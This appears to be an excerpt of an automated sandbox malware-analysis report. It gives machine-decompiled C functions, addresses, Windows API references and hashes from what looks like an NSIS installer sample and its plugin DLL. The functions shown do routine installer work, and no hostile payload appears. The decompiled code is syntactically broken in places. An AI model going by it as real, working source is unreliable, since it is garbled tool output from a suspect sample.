                                                                                                                                                                                            0x6ee81205
                                                                                                                                                                                            0x6ee8120c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee8120c
                                                                                                                                                                                            0x6ee81140
                                                                                                                                                                                            0x6ee81143
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81149
                                                                                                                                                                                            0x6ee8114c
                                                                                                                                                                                            0x6ee811b5
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee811b5
                                                                                                                                                                                            0x6ee8114f
                                                                                                                                                                                            0x6ee81152
                                                                                                                                                                                            0x6ee81198
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81198
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81299
                                                                                                                                                                                            0x6ee81299
                                                                                                                                                                                            0x6ee8129b
                                                                                                                                                                                            0x6ee812a3
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 6EE81163
                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6EE811B0
                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6EE811CD
                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 6EE811E0
                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 6EE81249
                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 6EE81297
                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6EE812A8
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3719184787.000000006EE81000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EE80000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3719111901.000000006EE80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3719267839.000000006EE84000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3719390298.000000006EE86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6ee80000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Global$Free$Alloc
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1780285237-0
                                                                                                                                                                                            • Opcode ID: d4f4627cb3bd32205129a252859d78d1f3a293008a413abf4bdeab38ac7011a2
                                                                                                                                                                                            • Instruction ID: e2ea77a5188add7beee63b60beeff3e407253a4790a1d143cbac1895bc2789e1
                                                                                                                                                                                            • Opcode Fuzzy Hash: d4f4627cb3bd32205129a252859d78d1f3a293008a413abf4bdeab38ac7011a2
                                                                                                                                                                                            • Instruction Fuzzy Hash: C251C0B14146429FDB45CFE8C850A6B7BE8FF0B308B20485DE4AADB350DB31E909CB51
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0040544F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 90stringCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 63%
                                                                                                                                                                                            			E0040544F(signed int __ecx, intOrPtr _a8, signed int _a12, signed int _a16) {
				int _v12;
				char _v48;
				char _v72;
				signed int _t21;
				void* _t24;
				void* _t32;
				void* _t41;
				signed char _t43;
				signed int _t44;
				signed char _t48;
				signed int _t49;
				signed int _t51;
				signed int _t52;
				void* _t57;
				signed int _t59;
				signed int _t61;

				_t21 = _a16;
				_t57 = 0xffffffdc;
				if(_t21 == 0) {
					_t52 = _a12;
					_t59 = _t52;
					asm("sbb ecx, ecx");
					_t41 = 0x14;
					asm("sbb eax, eax");
					_t24 = 0xffffffde;
					_t57 =  <  ? _t24 : _t57 +  ~0x100000;
					_t43 =  >=  ? (__ecx & 0xfffffff6) + _t41 : 0;
					if(_t59 < 0xffff3333) {
						asm("cdq");
						_t51 = 0x14;
						_t52 = _t59 + 1 / _t51;
					}
					_t48 = _t43;
					_t61 = _t52 >> _t48;
					_t49 = 0xa;
					_t44 = ((_t52 & 0x00ffffff) * 0xa >> _t48) % _t49;
				} else {
					_t61 = (_t21 << 0x00000020 | _a12) >> 0x14;
					_t44 = 0;
				}
				_push(_a8);
				_push(0x41f5e0);
				E00405D47();
				_push(0xffffffdf);
				_push( &_v72);
				_push(E00405D47());
				_push(_t57);
				_t32 = E00405D47();
				wsprintfA( &(0x41f5e0[lstrlenA(0x41f5e0)]), "%u.%u%s%s", _t61, _t44, _t32,  &_v48);
				return SetDlgItemTextA( *0x4237dc, _v12, 0x41f5e0);
			}



















                                                                                                                                                                                            0x0040544f
                                                                                                                                                                                            0x0040545c
                                                                                                                                                                                            0x0040545f
                                                                                                                                                                                            0x0040546d
                                                                                                                                                                                            0x00405476
                                                                                                                                                                                            0x00405481
                                                                                                                                                                                            0x00405486
                                                                                                                                                                                            0x0040548d
                                                                                                                                                                                            0x00405495
                                                                                                                                                                                            0x00405496
                                                                                                                                                                                            0x0040549d
                                                                                                                                                                                            0x004054a6
                                                                                                                                                                                            0x004054b1
                                                                                                                                                                                            0x004054b2
                                                                                                                                                                                            0x004054b5
                                                                                                                                                                                            0x004054b5
                                                                                                                                                                                            0x004054ba
                                                                                                                                                                                            0x004054c2
                                                                                                                                                                                            0x004054cd
                                                                                                                                                                                            0x004054d0
                                                                                                                                                                                            0x00405461
                                                                                                                                                                                            0x00405465
                                                                                                                                                                                            0x00405469
                                                                                                                                                                                            0x00405469
                                                                                                                                                                                            0x004054d2
                                                                                                                                                                                            0x004054db
                                                                                                                                                                                            0x004054dc
                                                                                                                                                                                            0x004054e1
                                                                                                                                                                                            0x004054e7
                                                                                                                                                                                            0x004054ed
                                                                                                                                                                                            0x004054ee
                                                                                                                                                                                            0x004054f4
                                                                                                                                                                                            0x0040550a
                                                                                                                                                                                            0x0040552a

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • lstrlenA.KERNEL32(Apteres Setup: Installing,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF,Apteres Setup: Installing,?,?,?,00000000,?), ref: 00405502
                                                                                                                                                                                            • wsprintfA.USER32 ref: 0040550A
                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,Apteres Setup: Installing), ref: 0040551E
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                            • String ID: %u.%u%s%s$Apteres Setup: Installing
                                                                                                                                                                                            • API String ID: 3540041739-1128924212
                                                                                                                                                                                            • Opcode ID: 8c36a087b2e9d7bfbca3fa7ecc4adc509495c7661f964312579de6a6a403f51b
                                                                                                                                                                                            • Instruction ID: aec75edd5607456022efdc329b5c9c4a5e437a69f85ecf7e659e163a61fcd382
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c36a087b2e9d7bfbca3fa7ecc4adc509495c7661f964312579de6a6a403f51b
                                                                                                                                                                                            • Instruction Fuzzy Hash: B32125737002182FD71069799C41EBBB68DCB81364F01473EFD66F32D1E9798C498965
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00401EA8 Relevance: 7.6, APIs: 5, Instructions: 74windowCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                            			E00401EA8(struct HWND__* __edx, intOrPtr _a16, signed int _a20, CHAR* _a24, signed int _a28, intOrPtr _a40, signed short _a44, int _a48, signed int _a52, struct tagRECT _a84, signed int _a92, signed int _a96) {
				struct HWND__* _t21;
				signed int _t22;
				signed int _t23;
				void* _t35;
				intOrPtr _t36;
				struct HWND__* _t40;
				signed int _t49;
				long _t50;
				int _t53;

				_t46 = __edx;
				if((_a52 & 0x00000100) == 0) {
					_t21 = GetDlgItem(__edx, _a48);
				} else {
					E00402E56(2);
				}
				_t40 = _t21;
				_t22 = _a52;
				_a20 = _t22 & 0x00000004;
				_t53 = _t22 & 0x00000003;
				_t49 = _t22 >> 0x0000001e & 0x00000001;
				_a28 = _t22 >> 0x1f;
				if((_t22 & 0x00010000) == 0) {
					_t23 = _a44 & 0x0000ffff;
				} else {
					_t23 = E00402E92(_t46, 0x11);
				}
				_a24 = _t23;
				GetClientRect(_t40,  &_a84);
				_t33 =  !=  ?  *0x4237f4 : 0;
				_t50 = LoadImageA( !=  ?  *0x4237f4 : 0, _a24, _t53, _a92 * _a28, _a96 * _t49, _a52 & 0x0000fef0);
				_t35 = SendMessageA(_t40, 0x172, _t53, _t50);
				if(_t35 != 0 && _t53 == 0) {
					DeleteObject(_t35);
				}
				if(_a40 >= 0) {
					_push(_t50);
					E00406408();
				}
				_t36 = _a16;
				 *0x4240c8 =  *0x4240c8 + _t36;
				return 0;
			}












                                                                                                                                                                                            0x00401ea8
                                                                                                                                                                                            0x00401eb0
                                                                                                                                                                                            0x00401ec1
                                                                                                                                                                                            0x00401eb2
                                                                                                                                                                                            0x00401eb4
                                                                                                                                                                                            0x00401eb9
                                                                                                                                                                                            0x00401ec7
                                                                                                                                                                                            0x00401ec9
                                                                                                                                                                                            0x00401ed7
                                                                                                                                                                                            0x00401edf
                                                                                                                                                                                            0x00401ee5
                                                                                                                                                                                            0x00401ee8
                                                                                                                                                                                            0x00401ef1
                                                                                                                                                                                            0x00401efc
                                                                                                                                                                                            0x00401ef3
                                                                                                                                                                                            0x00401ef5
                                                                                                                                                                                            0x00401ef5
                                                                                                                                                                                            0x00401f01
                                                                                                                                                                                            0x00401f0b
                                                                                                                                                                                            0x00401f38
                                                                                                                                                                                            0x00401f46
                                                                                                                                                                                            0x00401f50
                                                                                                                                                                                            0x00401f58
                                                                                                                                                                                            0x00401f5f
                                                                                                                                                                                            0x00401f5f
                                                                                                                                                                                            0x00401f6a
                                                                                                                                                                                            0x00401f70
                                                                                                                                                                                            0x0040169c
                                                                                                                                                                                            0x0040169c
                                                                                                                                                                                            0x00402cfc
                                                                                                                                                                                            0x00402d00
                                                                                                                                                                                            0x00402d12

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401EC1
                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401F0B
                                                                                                                                                                                            • LoadImageA.USER32(00000000,?,00000100,?,?,00000100), ref: 00401F40
                                                                                                                                                                                            • SendMessageA.USER32(00000000,00000172,00000100,00000000), ref: 00401F50
                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401F5F
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1849352358-0
                                                                                                                                                                                            • Opcode ID: be4974aec1a59db69752c7b0b78b66b6c8726364b28a433e9cf159e3db0eac9c
                                                                                                                                                                                            • Instruction ID: 3e4113d0814ce0ca369d8fbc91fe6e838ea1971a68ff1a39854a8231035d6554
                                                                                                                                                                                            • Opcode Fuzzy Hash: be4974aec1a59db69752c7b0b78b66b6c8726364b28a433e9cf159e3db0eac9c
                                                                                                                                                                                            • Instruction Fuzzy Hash: E221B072609701ABD310CB64DE48A6BBBE8FB88705F04093EF985F32A1D778C840DB59
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00401D73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86windowtimeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                            			E00401D73(void* _a8, void* _a12, struct HWND__* _a16, long _a20, struct HWND__* _a24, void* _a32, intOrPtr _a36, intOrPtr _a56, signed int _a60) {
				void* _v0;
				signed char _t24;
				void* _t26;
				long _t27;
				struct HWND__* _t28;
				int _t32;
				signed int _t33;
				int _t36;
				long _t44;
				int _t48;
				void* _t49;
				long _t51;
				int _t53;
				void* _t54;
				void* _t58;

				_t53 = E00402E56(3);
				_a24 = _t53;
				_t51 = E00402E56(4);
				_t24 = _a60;
				if((_t24 & 0x00000001) != 0) {
					__esi = E00402E92(__edx, 0x33);
					_a20 = __esi;
				}
				if((_t24 & 0x00000002) != 0) {
					_t51 = E00402E92(_t49, 0x44);
				}
				_push("true");
				if(_a36 != 0x21) {
					_t54 = E00402E92(_t49);
					_t26 = E00402E92(_t49);
					_t41 =  !=  ? _t26 : 0;
					_t43 =  !=  ? _t54 : 0;
					_t27 = FindWindowExA(_a16, _t51,  !=  ? _t54 : 0,  !=  ? _t26 : 0);
					goto L11;
				} else {
					_a24 = E00402E56();
					_t32 = E00402E56(2);
					_t48 = _a60 >> 2;
					if(_t48 == 0) {
						_t27 = SendMessageA(_a24, _t32, _t53, _t51);
						L11:
						_t44 = _t27;
						_t28 = _a16;
						_a20 = _t44;
					} else {
						_t33 = SendMessageTimeoutA(_a24, _t32, _t53, _t51, _t36, _t48,  &_a20);
						_t44 = _a20;
						asm("sbb eax, eax");
						_t28 =  ~_t33 + 1;
						_a16 = _t28;
					}
				}
				if( *((intOrPtr*)(_t58 + 0x28)) >= _t36) {
					_push(_t44);
					E00406408();
					_t28 = _a16;
				}
				 *0x4240c8 =  *0x4240c8 + _t28;
				return 0;
			}


















                                                                                                                                                                                            0x00401d7a
                                                                                                                                                                                            0x00401d7e
                                                                                                                                                                                            0x00401d87
                                                                                                                                                                                            0x00401d89
                                                                                                                                                                                            0x00401d91
                                                                                                                                                                                            0x00401d9a
                                                                                                                                                                                            0x00401da0
                                                                                                                                                                                            0x00401da0
                                                                                                                                                                                            0x00401da6
                                                                                                                                                                                            0x00401daf
                                                                                                                                                                                            0x00401daf
                                                                                                                                                                                            0x00401db6
                                                                                                                                                                                            0x00401db8
                                                                                                                                                                                            0x00401e10
                                                                                                                                                                                            0x00401e12
                                                                                                                                                                                            0x00401e1b
                                                                                                                                                                                            0x00401e23
                                                                                                                                                                                            0x00401e2c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00401dba
                                                                                                                                                                                            0x00401dc1
                                                                                                                                                                                            0x00401dc5
                                                                                                                                                                                            0x00401dd0
                                                                                                                                                                                            0x00401dd5
                                                                                                                                                                                            0x00401e01
                                                                                                                                                                                            0x00401e32
                                                                                                                                                                                            0x00401e32
                                                                                                                                                                                            0x00401e34
                                                                                                                                                                                            0x00401e38
                                                                                                                                                                                            0x00401dd7
                                                                                                                                                                                            0x00401de5
                                                                                                                                                                                            0x00401deb
                                                                                                                                                                                            0x00401df1
                                                                                                                                                                                            0x00401df3
                                                                                                                                                                                            0x00401df4
                                                                                                                                                                                            0x00401df4
                                                                                                                                                                                            0x00401dd5
                                                                                                                                                                                            0x00401e40
                                                                                                                                                                                            0x00401e46
                                                                                                                                                                                            0x0040169c
                                                                                                                                                                                            0x00402cfc
                                                                                                                                                                                            0x00402cfc
                                                                                                                                                                                            0x00402d00
                                                                                                                                                                                            0x00402d12

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SendMessageTimeoutA.USER32(?,00000000,00000000,00000000,?,?,?), ref: 00401DE5
                                                                                                                                                                                            • SendMessageA.USER32(00000021,00000000,00000000,00000000), ref: 00401E01
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                                                                                            • String ID: !
                                                                                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                                                                                            • Opcode ID: 0dd589e6225f4ba2c78bdbf67e85738f39873a2ac1892b18e57f7bf8b0693b8d
                                                                                                                                                                                            • Instruction ID: 32866eef2932d4109081f0bea035e0af278f444719ee7f047fbc8d116f455ed4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0dd589e6225f4ba2c78bdbf67e85738f39873a2ac1892b18e57f7bf8b0693b8d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8721D671658311AFD7149B21D90AA2B77E8EF84B54F14093FF985B21D0E6748C01C66E
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00406346 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E00406346(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x408298);
				}
				return _t7;
			}




                                                                                                                                                                                            0x00406347
                                                                                                                                                                                            0x0040635f
                                                                                                                                                                                            0x00406367
                                                                                                                                                                                            0x00406367
                                                                                                                                                                                            0x00406370

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403BF5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,756D3410,004038B6), ref: 0040634C
                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 00406356
                                                                                                                                                                                            • lstrcatA.KERNEL32(?,00408298), ref: 00406367
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00406346
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                            • API String ID: 2659869361-3355392842
                                                                                                                                                                                            • Opcode ID: bd67d16acabbfe2d4991454fd26cd55e5de9947e4dcef9af828e06dfb6bf5fdc
                                                                                                                                                                                            • Instruction ID: 13ea0ada17282a1e071b03998e0ceaaa9799e2f77abf81212bd5afd91ee9a0e4
                                                                                                                                                                                            • Opcode Fuzzy Hash: bd67d16acabbfe2d4991454fd26cd55e5de9947e4dcef9af828e06dfb6bf5fdc
                                                                                                                                                                                            • Instruction Fuzzy Hash: 92D05E31201A20ABD2011724AE0CD8B3B18AF02312705407AF685B2260CB38085687ED
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 6EE81C2B Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 199COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                            			E6EE81C2B(signed int __edx, char _a8, void* _a16) {
				char _v8;
				char _v28;
				void* _v32;
				signed int _v36;
				signed int _v40;
				void* _t28;
				char _t31;
				char _t32;
				signed int _t33;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t46;
				signed int _t51;
				void* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;
				signed int _t63;
				char _t67;
				signed int _t70;
				signed int _t72;
				void* _t79;
				void* _t81;
				signed int _t83;
				signed int _t86;
				void* _t91;

				_t70 = __edx;
				asm("xorps xmm0, xmm0");
				 *0x6ee85040 = _a8;
				 *0x6ee8503c = _a16;
				asm("movlpd [esp+0x10], xmm0");
				_t28 = E6EE8152B();
				_push(_t28);
				_v32 = _t28;
				_t72 = E6EE81326();
				_t63 = _t70;
				_t79 = E6EE8152B();
				_a16 = _t79;
				_t67 =  *_t79;
				_t31 = _t67;
				_a8 = _t31;
				if(_t67 == 0x7e) {
					L3:
					_t68 = _v36;
					_t83 = _v40;
					L4:
					_t32 = _t31;
					_t91 = _t32 - 0x2f;
					if(_t91 > 0) {
						_t33 = _t32 - 0x3c;
						__eflags = _t33;
						if(_t33 == 0) {
							__eflags =  *((char*)(_t79 + 1)) - 0x3c;
							if( *((char*)(_t79 + 1)) != 0x3c) {
								__eflags = _t63 - _t68;
								if(__eflags > 0) {
									L18:
									asm("xorps xmm0, xmm0");
									asm("movlpd [esp+0x10], xmm0");
									_t72 = _v40;
									_t63 = _v36;
									L19:
									_push( &_v28);
									_push(_t63);
									_push(_t72);
									E6EE8144D(_t68);
									E6EE8157E( &_v28);
									GlobalFree(_v32);
									return GlobalFree(_t79);
								}
								if(__eflags < 0) {
									L57:
									_t72 = 1;
									_t63 = 0;
									goto L19;
								}
								__eflags = _t72 - _t83;
								if(_t72 >= _t83) {
									goto L18;
								}
								goto L57;
							}
							_t70 = _t63;
							_t68 = _t83;
							_t41 = E6EE83090(_t72, _t83, _t70);
							L53:
							_t72 = _t41;
							_t63 = _t70;
							goto L19;
						}
						_t42 = _t33 - 1;
						__eflags = _t42;
						if(_t42 == 0) {
							__eflags = _t72 - _t83;
							if(_t72 != _t83) {
								goto L18;
							}
							__eflags = _t63 - _t68;
							L22:
							if(__eflags != 0) {
								goto L18;
							}
							goto L57;
						}
						_t43 = _t42 - 1;
						__eflags = _t43;
						if(_t43 == 0) {
							__eflags =  *((char*)(_t79 + 1)) - 0x3e;
							if( *((char*)(_t79 + 1)) != 0x3e) {
								__eflags = _t63 - _t68;
								if(__eflags < 0) {
									goto L18;
								}
								if(__eflags > 0) {
									goto L57;
								}
								__eflags = _t72 - _t83;
								if(_t72 <= _t83) {
									goto L18;
								}
								goto L57;
							}
							__eflags =  *((char*)(_t79 + 2)) - 0x3e;
							_t44 = _t72;
							_t70 = _t63;
							_t68 = _t83;
							if( *((char*)(_t79 + 2)) != 0x3e) {
								_t41 = E6EE830B0(_t44, _t68, _t70);
							} else {
								_t41 = E6EE830E0(_t44, _t68, _t70);
							}
							goto L53;
						}
						_t45 = _t43 - 0x20;
						__eflags = _t45;
						if(_t45 == 0) {
							_t72 = _t72 ^ _t83;
							_t63 = _t63 ^ _t68;
							goto L19;
						}
						_t46 = _t45 - 0x1e;
						__eflags = _t46;
						if(_t46 == 0) {
							__eflags =  *((char*)(_t79 + 1)) - 0x7c;
							if( *((char*)(_t79 + 1)) != 0x7c) {
								_t72 = _t72 | _t83;
								_t63 = _t63 | _t68;
								goto L19;
							}
							__eflags = _t72 | _t63;
							if((_t72 | _t63) != 0) {
								goto L57;
							}
							L17:
							__eflags = _t83 | _t68;
							if((_t83 | _t68) != 0) {
								goto L57;
							}
							goto L18;
						}
						__eflags = _t46 == 0;
						if(_t46 == 0) {
							_t72 =  !_t72;
							_t63 =  !_t63;
						}
						goto L19;
					}
					if(_t91 == 0) {
						L24:
						__eflags = _t83 | _t68;
						if((_t83 | _t68) != 0) {
							_push(_t68);
							_push(_t83);
							_push(_t63);
							_push(_t72);
							_t51 = E6EE82FB0();
							_t86 = _t63;
							_t72 = _t51;
							_t63 = _t70;
						} else {
							asm("xorps xmm0, xmm0");
							_t68 = _t72;
							asm("movlpd [esp+0x10], xmm0");
							_t86 = _t63;
							_t63 = _v36;
							_t72 = _v40;
						}
						__eflags = _v8 - 0x2f;
						if(_v8 != 0x2f) {
							_t72 = _t68;
							_t63 = _t86;
						}
						goto L19;
					}
					_t52 = _t32 - 0x21;
					if(_t52 == 0) {
						__eflags = _t72 | _t63;
						goto L22;
					}
					_t53 = _t52 - 4;
					if(_t53 == 0) {
						goto L24;
					}
					_t54 = _t53 - 1;
					if(_t54 == 0) {
						__eflags =  *((char*)(_t79 + 1)) - 0x26;
						if( *((char*)(_t79 + 1)) != 0x26) {
							_t72 = _t72 & _t83;
							_t63 = _t63 & _t68;
							goto L19;
						}
						__eflags = _t72 | _t63;
						if((_t72 | _t63) == 0) {
							goto L18;
						}
						goto L17;
					}
					_t55 = _t54 - 4;
					if(_t55 == 0) {
						_t41 = E6EE82ED0(_t72, _t63, _t83, _t68);
						goto L53;
					} else {
						_t56 = _t55 - 1;
						if(_t56 == 0) {
							_t72 = _t72 + _t83;
							asm("adc ebx, ecx");
						} else {
							if(_t56 == 0) {
								_t72 = _t72 - _t83;
								asm("sbb ebx, ecx");
							}
						}
						goto L19;
					}
				}
				_a8 = _t67;
				if(_t67 == 0x21) {
					goto L3;
				} else {
					_t81 = E6EE8152B();
					_push(_t81);
					_t83 = E6EE81326();
					_v40 = _t70;
					GlobalFree(_t81);
					_t79 = _a16;
					_t68 = _v40;
					_t31 =  *_t79;
					_a8 = _t31;
					goto L4;
				}
			}

































                                                                                                                                                                                            0x6ee81c2b
                                                                                                                                                                                            0x6ee81c32
                                                                                                                                                                                            0x6ee81c38
                                                                                                                                                                                            0x6ee81c42
                                                                                                                                                                                            0x6ee81c47
                                                                                                                                                                                            0x6ee81c4d
                                                                                                                                                                                            0x6ee81c52
                                                                                                                                                                                            0x6ee81c53
                                                                                                                                                                                            0x6ee81c5d
                                                                                                                                                                                            0x6ee81c5f
                                                                                                                                                                                            0x6ee81c66
                                                                                                                                                                                            0x6ee81c68
                                                                                                                                                                                            0x6ee81c6c
